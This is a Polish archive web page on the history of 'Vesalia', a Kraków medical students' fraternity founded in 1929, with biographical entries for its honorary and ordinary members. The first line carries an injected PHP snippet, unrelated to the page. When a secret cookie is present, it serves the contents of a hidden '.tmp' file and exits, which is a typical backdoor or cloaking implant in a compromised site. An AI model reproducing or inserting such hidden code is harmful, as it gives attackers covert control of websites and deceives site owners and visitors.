if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Vesalia

Dekiel Vesalii - vide Poszukiwania. Nazwa:
Korporacja Studentów Wydziału Lekarskiego Uniwersytetu Jagiellońskiego “Vesalia”
Siedziba:
Kraków
Data powstania:
15 X 1929 r.
Barwy:
wiśniowa – srebrna – jasnoniebieska
Dewiza:
„Pro Poloniae bono, fraternitate et labore” („Dla dobra Polski przez braterstwo i pracę”)

Rys historyczny

Cyrkiel Vesalii prof. Stanisława Maziarskiego, lata 30-te.

Vesalia powstała dnia 15 X 1929 r. Była typową korporacją wydziałową i skupiała wyłącznie studentów Wydziału Lekarskiego Uniwersytetu Jagiellońskiego. Od 15 XI 1929 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 15 XI 1929 r.). Kandydowała pod opieką K! Corolla. Prawa członka rzeczywistego Związku uzyskała dnia 10 XII 1931 r.

Kuratorami Vesalii z ramienia uniwersyteckiego Senatu byli w 1931 r. prof. Emil Godlewski, a w 1938 r. prof. Janusz Zubrzycki. W 1931 r. siedziba Korporacji mieściła się w Domu Medyków przy ul. Grzegórzeckiej 20.

Listownik Vesalii, 1931 r.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 97 nazwisk, w tym pięciu członków honorowych. W 1938 r. liczyła 68 członków, w tym czterech członków honorowych.

Brak wiadomości dotyczących powojennej działalności Korporacji i spotkań jej członków

Lista członków

Vesalia, lata 30-te.

Poniższa, niekompletna lista członków Vesalii obejmuje niemal 100 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Emil Godlewski, (12 sierpnia 1875 w Hołosku Wielkim pod Lwowem - 25 kwietnia 1944 w Krakowie) s. Emila, absolwent wydziałów medycznego i filozoficznego UJ, lekarz, biolog, embriolog, od 1906 prof. UJ, dziekan Wydziału Lekarskiego UJ 1917/18, 1918/19 i 1931/32, od 1918 członek PAU, nadzwyczajny komisarz rządu polskiego do walki z epidemiami 1920, od 1924 senator RP z ramienia Związku Ludowo-Narodowego, dr honoris causa UJ i UJK, laureat nagrody naukowej m. st. Warszawy 1935, od 1935 członek Papieskiej Akademii Umiejętności, Filister honorowy Akropolii, kurator i Filister honorowy Vesalii
 2. Bronisław Edward Andrzej Kader, (23 kwietnia [5 maja] 1863 w Wilnie - 24 października 1937 w Krakowie) s. Andrzeja (Konwent Polonia, nr ew. 502) i Anny z Lipińskich, absolwent Gimnazjum w Wilnie, student i absolwent med. UD, c. II sem. 1881 Konwent Polonia [nr ew. 859], dr med. 1891, od 1891 pracownik kliniki Jana Mikulicz-Radeckiego we Wrocławiu, habilitacja 1897, od 1899 kierownik katedry chirurgii UJ, dziekan Wydziału Lekarskiego UJ 1910, prezes, a później członek honorowy Towarzystwa Lekarskiego Krakowskiego 1914, od 1914 lekarz sztabowy armii austriackiej, inspektor chirurgicznych oddziałów zabiegowych twierdzy Kraków oraz komendant fortecznego szpitala klinicznego, pułk, po wojnie prof. zw. chirurgii teoretycznej UJ, Filister honorowy Vesalii, pochowany w grobowcu rodzinnym na Cmentarzu Ewangelickim w Wilnie
 3. Stanisław Maziarski, (27 kwietnia 1873 w Tarnowie - 6 sierpnia 1956 w Krakowie) ojciec Kazimierza (Montana), student i absolwent med. UJ 1891-97, następnie studiował w Nancy i Monachium, od 1895 asystent w Katedrze Fizjologii UJ, dr med. UJ 1897, habilitacja UJ 1900, prof. nadzw. 1907, prof. zw. 1911, kierownik Katedry Histologii UJ 1907-51, czterokrotnie dziekan Wydziału Lekarskiego 1916/17 i 1922/25, rektor UJ 1933-36, od 1927 członek korespondent, a od 1930 członek czynny PAU, w czasie I wojny światowej lekarz w armii austriackiej, a następnie w WP, ppłk, Filister honorowy Montany i Vesalii, w 1931 r. i 1938 r. przewodniczący Koła Filistrów Montany, po wybuchu II wojny światowej aresztowany w ramach Sonderaktion Krakau, więzień Sachsenhausen, zwolniony, w czasie okupacji współorganizator i wykładowca tajnego Wydziału Lekarskiego, pochowany na Cmentarzu Rakowickim w Krakowie
 4. Tadeusz Pawlas, (6 marca 1891-1953) s. Waleriana i Anny z d. Skórkowska, dermatolog i wenerolog, wykładowca w Krakowie, kierownik Kliniki Dermatologii USB 1922-35, Filister honorowy Vesalii, w czasie wojny wykładowca tajnego Wydziału Lekarskiego USB, po wojnie organizator i kierownik Katedry i Kliniki Dermatologii UMK w Toruniu
 5. Janusz Zubrzycki, prof. UJ, kurator i Filister honorowy Vesalii

Członkowie rzeczywiści

 1. Lucjan Bański, (16 sierpnia 1911 w Sosnowcu - 1994) student i absolwent 1947 med. UJ, akt. 1938-39, chirurg, w 1956 w Katowicach
 2. Rudolf Bednarczyk, (30 marca 1912 w Mszanie Dolnej - ) student i absolwent 1939, med. UJ, akt. 1938-39, w 1956 kierownik Ośrodku Zdrowia w Tymbarku w pow. Limanowskim
 3. Franciszek Bibiella, student i absolwent med. UJ, akt. 1930-31
 4. Kazimierz Boczar, (8 czerwca 1909 w Krakowie - 1 kwietnia 1982 w Krakowie) brat Mieczysława (Arcadia), student i absolwent 1934 med. UJ, dr med. UJ 1939, dermatolog, w 1956 adiunkt w Klinice Dermatologii AM w Krakowie
 5. Stanisław Marian Bogusz, (14 sierpnia 1912 w Bobowie w pow. gorlickim - 11 marca 1978 w Nowym Sączu) student i absolwent 1937 med. UJ, akt. 1934, dr med. (?), chirurg, pracował m.in. jako ordynator w Szpitalu Powszechnym w Nowym Sączu 1945-78
 6. Stefan Bronikowski (Bonikowski), student med. UJ, akt. 1938-39, prezes sem. let. 1938/39
 7. Jan Brzeski, student i absolwent med. UJ, akt. 1930-31
 8. Józef Bugaj, (29 listopada 1914 w Ostrowie na Morawach - 2003) student i absolwent 1945 med. UJ, akt. 1938-39, dr med. 1949, chirurg, w 1956 dyrektor Szpitala Powiatowego w Limanowej
 9. Józef Karol Bulanda, (24 marca 1909 w Rotthausen w Niemczech - ) student i absolwent 1935 med. UJ, akt. 1929-31, dr med. (?), chirurg, w 1931 pracował w Szpitalu Spółki Brackiej w Rydułtowach, w 1956 w Rydułtowach
 10. Stanisław Chwalibóg, (14 kwietnia 1909 w Skałacie - ) student i absolwent 1935 med. UJ, akt. 1930-31, dr med. UJ 1951, chirurg, w 1956 w Chrzanowie
 11. Jan Ciapka, student med. UJ, akt. 1938-39
 12. Adam Cyrkowicz, (1910 - 30 lipca 1952) student i absolwent med. UJ, akt. 1930-31, skarbnik sem. let. 1930/31, wiceprezes wewn. sem. zim. 1931/32, dr med., w 1938 w Szpitalu Powszechnym w Grolicach
 13. Zbigniew Czapliński, (16 kwietnia 1909 - ) student i absolwent 1933 med. UJ, akt. 1930-31, sekretarz zewn. sem. zim. 1930/31, wiceprezes wewn. sem. let. 1930/31, dr med. 1947, internista, w 1938 w Krakowie
 14. Rudolf Czylok, student med. UJ, c. 1938, akt. 1938-39
 15. Janusz Daab, (1918-1988) student i absolwent med. UJ, c. 1938, akt. 1938-39, sekretarz sem. let. 1938/39
 16. Emil Dąbrowski, student i absolwent med. UJ, akt. 1930-31
 17. Tadeusz Wiktor Drozdowski, (22 sierpnia 1917 w Cieszynie - po 1956) student i absolwent 1948 med. UJ, akt. 1938-39, sekretarz sem. zim. 1938/39, dr med. Akademia Medyczna w Rokitnicy 1951
 18. Jan Włodzimierz Dygdoń, (25 grudnia 1908 w Ostrowie - 1984) student i absolwent 1949 med. UJ, c. 1930, akt. 1930-31
 19. Bogusław Marian Fabiański, (28 września 1913 w Bochni - ) student i absolwent 1939 (1945) med. UJ, akt. 1934-39, prezes 1935/36, dr med. Akademia Medyczna w Rokitnicy, chirurg, w 1956 dyrektor Szpitala Miejskiego w Szopienicach
 20. Stanisław Frańczuk, (1919-1991) student i absolwent med. UJ, c. 1938, akt. 1938-39
 21. Tadeusz Funiok, student med. UJ, akt. 1938-39, skarbnik sem. zim. 1938/39
 22. Józef Gajda, student i absolwent med. UJ, akt. 1929-36, przewodniczący Komisji Rewizyjnej sem. let. 1933/34, dr med.
 23. Jan Gątkiewicz, student i absolwent med. UJ, c. 1930, akt. 1930-31
 24. Marian Kazimierz Gergovich (Gergowich), (23 stycznia 1905 w Jaworznie w pow. chrzanowskim - ) student i absolwent 1933 med. UJ, akt. 1930-31, dr med. UJ 1936, ginekolog-położnik, w 1956 w Krakowie
 25. Eugeniusz Gerulewicz, student med. UJ, c. 1938, akt. 1938-39
 26. Adam Górka, student i absolwent med. UJ, akt. 1930-32, wiceprezes zewn. sem. zim. 1931/32, dr med., w 1938 w Krakowie
 27. Henryk Jan Grabowski, (15 marca 1914 w Piotrkowie Trybunalskim - ) student i absolwent 1949 med. UJ, akt. 1938-39, olderman sem. zim. 1938/39, chirurg, w 1956 w Żyrardowie
 28. Jerzy Kazimierz Grabowski, (15 maja 1914 w Krakowie - ) student i absolwent 1945 med. UJ, akt. 1938-39, neurolog, w 1956 w Krakowie
 29. Jan Hiller, ( - 1939-45 w Auschwitz) student med. UJ, sekretarz sem. let. 1933/34, więzień obozu koncentracyjnego w Auschwitz
 30. Jerzy Jeżewski, student i absolwent med. UJ, c. 1930, akt. 1930-31
 31. Jerzy Kachnikiewicz, student med. UJ, c. 1938, akt. 1938-39
 32. Jan Kaczmarczyk, student i absolwent med. UJ, akt. 1930-31, dr med.
 33. Józef Kalęba, student i absolwent med. UJ, dr med., w 1938 w Szpitalu Powszechnym w Żółkwi
 34. Zygmunt Karczewski, student med. UJ, c. 1938, akt. 1938-39
 35. Artur Knapik, (7 listopada 1915 w Mikołowie - ) student i absolwent 1945 med. UJ, akt. 1938-39, dr med. Akademia Medyczna w Rokitnicy 1952, chirurg, w 1956 dyrektor Szpitala im. Biegańskiego w Częstochowie
 36. Janusz Kobyliński, student med. UJ, akt. 1938-39
 37. Karol Tadeusz Konopacki, (4 listopada 1917 w Mszanie Dolnej - ) student i absolwent 1947 med. UJ, c. 1938, akt. 1938-39, w 1956 w Gdańsku
 38. Emanuel Antoni Kopieczny, (1 grudnia 1914 w Wielkich Hajdukach - ) student i absolwent 1945 med. UJ, akt. 1938-39

  Włodzimierz Kozłowski, 1984 r.

 39. Włodzimierz (Vladimir L.) Kozłowski, (31 maja 1918 w Sankt Petersburgu - 18 maja 2001 w Urbana w Stanach Zjednoczonych) s. Włodzimierza i Marii, student med. UJ, c. 1937, akt. 1937-39, oficer kawalerii w wojnie obronnej 1939, uczestnik konspiracji, kapitan w Brytyjskich Siłach Zbrojnych 1945, po wojnie pozostał w Niemczech, a w 1948 wyemigrował do Stanów Zjednoczonych, ukończył Uniwersytet w Hamburgu, dr med., psychiatra, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, odznaczony m.in. Virtuti Militari oraz francuskim Croix de Guerre

 40. Stanisław Krawiec, student i absolwent med. UJ, akt. 1930-31
 41. Józef Krupa, (16 maja 1910 w Krakowie - 1982) student i absolwent 1953 med. UJ, akt. 1930-31, sekretarz wewn. sem. zim. 1930/31, dr med. (?), pediatra, w 1956 w Bochni
 42. Władysław Piotr Kubisty, (18 czerwca 1910 w Krakowie - 1976) student i absolwent 1935 med. UJ, akt. 1930-31, wiceprezes zewn. sem. let. 1930/31, dr med. UJ 1938, chirurg, w 1938 w Klinice Chirurgicznej w Krakowie, w 1956 w Bytomiu
 43. Jan Malczewski, student i absolwent med. UJ, c. 1930, akt. 1930-31
 44. Wojciech Markowski, student med. UJ, c. 1938, akt. 1938-39
 45. Juliusz Masło, student i absolwent med. UJ, c. 1930, akt. 1930-31
 46. Stanisław Baltazar Matusiński, (18 lipca 1912 w Lackiej Woli w pow. Mościska - ) student med. UJ, student i absolwent 1938 UW, c. 1930, akt. 1930-31, chirurg, w 1956 w Słupsku
 47. Marian Ignacy Mądroszkiewicz, (7 grudnia 1906 w Krotoszyn - 1982) student i absolwent 1933 med. UJ, akt. 1929-31, olderman sem. zim. 1930/31, prezes sem. let. 1930/31, dr med. UJ 1935, okulista, w 1938 w Klinice Okulistycznej w Krakowie, w 1956 kierownik Kliniki Okulistycznej AM w Krakowie
 48. Jerzy Miarczyński, (20 października 1910 w Krakowie - ) student i absolwent 1945 med. UJ, akt. 1930-34, prezes sem. let. 1933/34
 49. Zdzisław Miecznik, student i absolwent med. UJ, akt. 1930-32, sekretarz sem. zim. 1931/32, dr med., w 1938 w Częstochowie
 50. Jan Mierowski, (17 lutego 1908 w Brukseli - ) student i absolwent 1939 (1945) med. UJ, akt. 1930-31, I wiceprezes sem. zim. 1930/31, olderman sem. let. 1930/31, dr med. 1945, laryngolog, w 1956 dyrektor Szpitala im. Rydygiera w Częstochowie
 51. Jerzy Bolesław Mrozowski, (27 marca 1916 w Kramarzówce - ) student i absolwent 1947 med. UJ, c. 1938, akt. 1938-39, dr med. UJ 1949
 52. Mieczysław Muniak, (23 września 1919 w Mielcu - ) student i absolwent 1950 med. UJ, c. 1938, akt. 1938-39
 53. Tadeusz Stefan Muszyński, (26 września 1918 w Tarnowie - ) student i absolwent 1949 med. UJ, c. 1938, akt. 1938-39, neurolog, w 1956 w Krakowie
 54. Jan Józef Nieć, (19 lutego 1910 w Wadowicach - ) student i absolwent 1936 med. UJ, akt. 1930-31, dr med. UJ 1949, chirurg, w 1956 w Krakowie
 55. Jerzy Lesław Nowicki, (22 grudnia 1915 w Wadowicach - ) student i absolwent 1943 (1945) med. UJ, akt. 1937-38, wiceprezes sem. zim. 1938/39, prezes sem. let. 1938/39, dr med. UP 1946, epidemiolog, w 1956 w Krakowie
 56. Władysław Obracaj, (27 października 1917 w Dzięgielku - ) student i absolwent 1948 med. UJ, c. 1938, akt. 1938-39
 57. Bernard Stanisław Perek, (17 maja 1904 w Lesznie - 1984/85) matura Leszno 1923, student med. UJK, założyciel Obotritii, później student med. UJ, c. 1938 Vesalia, akt. 1938-39, absolwent med. UJK 1939, okulista, w 1956 we Wrocławiu
 58. Jerzy Piątkowski, (17 sierpnia 1916 w Krakowie -2004) student i absolwent 1942 (1945) med. UJ, akt. 1935-39, prezes sem. zim. 1938/39, skarbnik Krakowskiego Koła Międzykorporacyjnego 1936/37, wiceprezes Krakowskiego Koła Międzykorporacyjnego sem. zim. 1938/39, dr med. UJ 1946, ginekolog-położnik, w 1956 w Zakopanym
 59. Stanisław Antoni Pilch, (10 czerwca 1918 w Szymbarku - ) student i absolwent 1951 med. UJ, c. 1938, akt. 1938-39, chirurg, w 1956 w Krakowie
 60. Tadeusz Pilecki, student med. UJ, c. 1938, akt. 1938-39
 61. Franciszek Pluta, (2 kwietnia 1915 w Kochłowicach - ) student i absolwent 1951 med. UJ, c. 1938, akt. 1938-39, lekarz przemysłowy, w 1956 w Bytomiu
 62. Ludwik Poje, (22 lipca 1909 w Krakowie - 1991) student i absolwent 1935 med. UJ, akt. 1929-31, dr med. UJ 1946, chirurg i radiolog, w 1956 w Krakowie
 63. Tadeusz Karol Puskarczyk, (4 maja 1911 w Tarnowie - 1989) student i absolwent 1935 med. UJ, c. 1930, akt. 1930-31, dr med. UJ 1945, pediatra, w 1956 dyrektor Szpitala Powiatowego w Olkuszu
 64. Tadeusz Pykosz, (16 kwietnia 1910 w Przemyślu - ) student i absolwent 1935 med. UJ, akt. 1929-31, II wiceprezes sem. zim. 1930/31, sekretarz wewn. sem. let. 1930/31, prezes sem. zim. 1931/32, dr med. UJ 1939, laryngolog, w 1938 w Szpitalu Ubezp. Sp. w Czerwonym Prądniku, w 1956 w Krakowie
 65. Władysław Radecki, student i absolwent med. UJ, akt. 1932-34, wiceprezes i olderman sem. let. 1933/34, Filister bene meritus Vesalii, dr med., w 1938 w P.Z.H. w Warszawie
 66. Mieczysław Riessner, student med. UJ, c. 1938, akt. 1938-39
 67. Adam Tadeusz Rosławski, (8 września 1916 w Krakowie - 2001) student i absolwent 1942 (1945) med. UJ, akt. 1938-39, internista, w 1956 adiunkt w Klinice Chorób Wewnętrznych AM we Wrocławiu
 68. Marian Skopiński, (7 października 1910 (15?) - 2003?) student i absolwent 1951 med. UJ, akt. 1938-39
 69. Emil Słabiak, ( - 1938) student i absolwent med. UJ, akt. 1930-31, gospodarz sem. let. 1930/31, dr med., w 1938 w Szpitalu oo. Bonifratrów w Krakowie
 70. Jerzy Sobolewski, (31 maja 1920 w Sandomierzu - 9 czerwca 1972 w Krakowie) s. Stanisława i Stefanii, brat stryjeczny Zdzisława (Vesalia), absolwent Miejskiego Gimnazjum im. J. Piłsudskiego w Sandomierzu, student i absolwent 1950 med. UJ, żołnierz ZWZ-AK, od grudnia 1944 w 2 Pułku Piechoty 2 Dywizji Piechoty AK, ppor., p.o. lekarza kompanii, po ukończeniu studiów lekarz w kopalni Bobrek, a jednocześnie asystent w Klinice Chirurgii Śląskiej AM, chirurg w Szpitalu oo. Bonifratrów w Krakowie 1955-72, odznaczony m.in. Złotym Krzyżem Zasługi, Krzyżem AK, Krzyżem Partyzanckim
 71. Zdzisław Sobolewski, (1917-1939) brat Jerzego (Vesalia), student i absolwent med. UJ, akt. 1938-39, działacz i wiceprezes Młodzieży Wszechpolskiej, zginął w wojnie obronnej 1939
 72. Jan Zbigniew Sowa, (27 grudnia 1916 w Lublinie - 2000) student med. UJ, student i absolwent med. UJK 1943 (nostryfikowany UJ 1946), laryngolog, w 1956 w Sopocie
 73. Wacław Stoch, student med. UJ, akt. 1930-31
 74. Witold Stoeger, student med. UJ, akt. 1938-39
 75. Kazimierz Szczurowski, student i absolwent med. UJ, c. 1930, akt. 1930-31 [być może chodzi o: Kazimierz Szczurkowski (20 kwietnia 1909 w Modrzejowie - ) student i absolwent 1946 med. UJ, chirurg, kierownik Ośrodka Zdrowia w miejsc. Kryg k. Gorlic]
 76. Jerzy Szpunar, (1 października 1914 w Nowym Sączu - 1976) student i absolwent 1938 med. UJ, akt. 1932-34, dr med. UJ 1945, habilitacja UJ 1952, laryngolog, w 1956 doc. przy Katedrze Laryngologii AM w Krakowie
 77. Jerzy Marian Tabeau, (8 grudnia 1918 z Zabłotowie - 2002) student i absolwent 1947 med. UJ, akt. 1938-39, dr med. UJ 1949, internista, w 1956 w Krakowie
 78. Jan Tekla, student med. UJ, c. 1938, akt. 1938-39
 79. Franciszek Tkaczyk, (1916 - ) student med. UJ, c. 1938, akt. 1938-39
 80. Julian Trella, student i absolwent med. UJ, akt. 1930-31
 81. Edward Trześniowski, (1912 - ) student i absolwent med. UJ, akt. 1934-39, olderman 1935/36
 82. Mieczysław Trzos, student i absolwent med. UJ, c. 1930, akt. 1930-31, w 1938 w Dziedzicach
 83. Witold Tylusiński, w 1938 w Busku
 84. Zbigniew Wlazłowski, (30 sierpnia 1916 w Urzepowicach w pow. przeworskim - ) student i absolwent 1947 med. UJ, c. 1938, akt. 1938-39, radiolog, w 1956 w Gdyni
 85. Augustyn Wróbel, student i absolwent med. UJ, akt. 1933-39, wiceprezes i skarbnik 1935/36
 86. Włodzimierz Wtorzecki, student i absolwent med. UJ, akt. 1930-31
 87. Tadeusz Józef Zaczek, (1915 - ) student i absolwent 1939, med. UJ, akt. 1936, dr med. UJ 1946
 88. Alfred Zajdel, student i absolwent med. UJ, akt. 1929-31, prezes sem. zim. 1930/31, sekretarz zewn. sem. let. 1930/31, olderman sem. zim. 1931/32, dr med., w 1938 w Wierzbniku
 89. Antoni Zaufal, (1914-1975) student i absolwent med. UJ, akt. 1933-39
 90. Franciszek Zawisza, (1 maja 1911 w Dębowcu w pow. jasielskim - ) student i absolwent 1952 med. UJ, c. 1930, akt. 1930-31, w 1956 w Czeladzi

  Kazimierz Ziarko, ok. 1933 r.

 91. Kazimierz Ziarko, (1 sierpnia 1910 w Nowym Targu - 31 lipca 1972 w Katowicach) s. Franciszka i Anny z d. Karasińska, uczeń gimnazjów w Tarnowie i Wieliczce, matura Wieliczka, student i absolwent med. UJ, c. 1930, akt. 1930-31, dr med., ginekolog, chirurg, po studiach lekarz w szpitalu w Krakowie, lekarz zakładowy “Huta Pokój” w Nowym Bytomiu 1938-41, ponownie w szpitalu w Krakowie, po wojnie lekarz w Katowicach i Wrocławiu, ordynator oddziałów ginekologii i dyrektor szpitali w Myszkowie i Zawierciu, ordynator oddziału ginekologii szpitala w Siemianowicach Śląskich, pochowany na Cmentarzu przy ul. Gliwickiej w Katowicach

 92. Jerzy Żabicki, student med. UJ, sekretarz 1935/36, olderman 1937, po wojnie na emigracji w Niemczech

Pieczęć Vesalii, 1931 r.

Listę członków opracowano na podstawie:

1) “Vesalia” Korporacja Studentów Wydziału Lekarskiego U.J., (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1930-1931, Kraków 1931, s. 43 i n.,
2) Vesalia Korporacja Studentów Wydziału Lekarskiego U.J., (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1938-1939, Kraków 1938, s. 38 i n.,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Vesalia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 26 VIII 2010 r.
Ostatnia zmiana: 13 II 2012 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Studentów Wydziału Lekarskiego Uniwersytetu Jagiellońskiego “Vesalia” w Krakowie, (na:) www.archiwumkorporacyjne.pl, stan 13 II 2012 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }